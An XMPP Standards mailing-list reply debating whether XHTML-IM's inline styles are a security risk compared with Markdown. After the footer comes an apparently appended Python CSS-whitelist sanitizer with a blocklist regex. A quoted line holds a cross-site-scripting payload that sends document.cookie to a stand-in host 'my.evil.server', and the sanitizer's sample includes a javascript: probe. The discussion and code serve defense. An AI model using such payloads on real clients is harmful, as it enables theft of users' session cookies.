On Thursday 12 October 2017, 13:13:17 CEST, Dave Cridland wrote:
> But out of curiosity, do you allow inline style in your uses of XHTML-IM?

yes

> So can something like the following work:
>
> <p style='background-image: url(&dquot;javascript:new
> Image().src='http://my.evil.server/?cookie=' +
> encodeURI(document.cookie);&dquot;);'>Hello</p>

no: styles are whitelisted and background-image is not accepted + values are parsed and url is not accepted either.

> A solid CSP will block this for newer browsers, of course, and
> background-image is a SHOULD NOT in XEP-0071 as well. But I'd be
> surprised if many implementations are filtering CSS at the property
> level.

We do in SàT, and I hope we are not the only one. But again it's an implementation issue, not spec.

> I'm depressingly well aware of the failure of Markdown to standardize
> on a single dialect, but I'm also well aware that the state of the art
> in HTML-based applications is to use simple Markdown rather than HTML
> for any user entered rich text, because of the very high risk of
> security problems.

It totally makes sense that Markdown is not being standardized: it's a writing syntax (as its name says), not a publishing one. While XHTML (and by extension XHTML-IM) is a publishing syntax, well defined and with a schema, Markdown is a really poor choice for publishing: there is no such thing as invalid Markdown, every text is valid Markdown, but the result will be different according to the rendering library used. In addition it doesn't help with security (especially given that HTML can be embedded in Markdown). On the other hand it's a handy syntax to write (we implement it), and it's easily rendered to (X)HTML, so people can use it in clients without problem. I totally see the reason to use it for end users, just not as a way of publishing.

> Honestly, I think we're trading years of insecurity for a little
> incompatibility.

Are all current implementations unfixed for years? Did they get reports and not fix the issue? If so, I would see the issue more on the dev side, and I don't think changing syntax will help in any way.

Security issues happen like every bug, but it's an implementation thing and must be fixed once reported. XHTML (and by extension XHTML-IM) is well defined, and we know how to represent it (the same XHTML-IM must give the same result everywhere), it is well adapted to XMPP, it's already implemented everywhere and it's working. I really think there is no reason to change other than to bring trouble, and that we have many more important things to work on (having a working MIX, fixing Pubsub, encryption, etc).

Cheers
Goffi

_______________________________________________
Standards mailing list
Info: https://mail.jabber.org/mailman/listinfo/standards
Unsubscribe: [email protected]
_______________________________________________
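The property-level CSS filtering described in the reply above (a whitelist of style properties, with values parsed and url() rejected), as an added example in Python. This is not SàT's code and does not reproduce its actual whitelist; the ALLOWED_PROPERTIES set, the value grammar, and the SAMPLE XHTML-IM stanza carrying a background-image probe are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumed whitelist for this example (not SàT's real list): a subset of the
# properties XEP-0071 recommends. Anything else, including background-image,
# is dropped regardless of its value.
ALLOWED_PROPERTIES = {
    "color", "background-color", "font-family", "font-size", "font-style",
    "font-weight", "margin-left", "margin-right", "text-align",
    "text-decoration",
}

# Allow-list grammar for values: a hex colour, a bare keyword, or a number
# with an optional unit, optionally followed by a comma-separated keyword
# list (font-family fallbacks). Quoted strings, url(), functions and escapes
# do not match, so they are rejected even for an allowed property.
_SAFE_VALUE = re.compile(
    r"^(?:#[0-9a-fA-F]{3,6}|[a-zA-Z-]+|\d+(?:\.\d+)?(?:px|pt|em|%)?)"
    r"(?:\s*,\s*[a-zA-Z-]+)*$"
)

# Defence in depth: explicit rejects for the well-known dangerous shapes,
# checked before the grammar so a future loosening of _SAFE_VALUE cannot
# silently let them through.
_FORBIDDEN = re.compile(r"url\s*\(|expression\s*\(|javascript:|@import|\\", re.I)


def sanitize_style(style):
    """Keep only whitelisted 'property: value' declarations from a style attribute."""
    kept = []
    for declaration in style.split(";"):
        if ":" not in declaration:
            continue  # malformed fragment, drop it
        prop, _, value = declaration.partition(":")
        prop = prop.strip().lower()
        value = value.strip()
        if prop not in ALLOWED_PROPERTIES:
            continue
        if _FORBIDDEN.search(value):
            continue
        if not _SAFE_VALUE.match(value):
            continue
        kept.append(f"{prop}: {value}")
    return "; ".join(kept)


def sanitize_xhtml_im(xml_text):
    """Rewrite every style attribute in an XHTML-IM fragment; drop empty ones."""
    root = ET.fromstring(xml_text)
    for element in root.iter():
        if "style" in element.attrib:
            clean = sanitize_style(element.attrib["style"])
            if clean:
                element.set("style", clean)
            else:
                del element.attrib["style"]
    return ET.tostring(root, encoding="unicode")


# Constructed sample stanza: an allowed colour next to a background-image
# probe of the kind quoted in the thread (javascript: URL inside url()).
SAMPLE = (
    "<html xmlns='http://jabber.org/protocol/xhtml-im'>"
    "<body xmlns='http://www.w3.org/1999/xhtml'>"
    "<p style='background-image: url(\"javascript:alert(document.cookie)\");"
    " color: #ff0000'>Hello</p>"
    "</body></html>"
)

if __name__ == "__main__":
    print(sanitize_xhtml_im(SAMPLE))
```

The grammar is deliberately strict: quoted font names such as "Times New Roman" are rejected along with everything else that does not match, which is the right failure direction for content received from another client. The blocklist regex is secondary; the whitelist of properties and the value grammar are what actually keep url() and expression() out.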
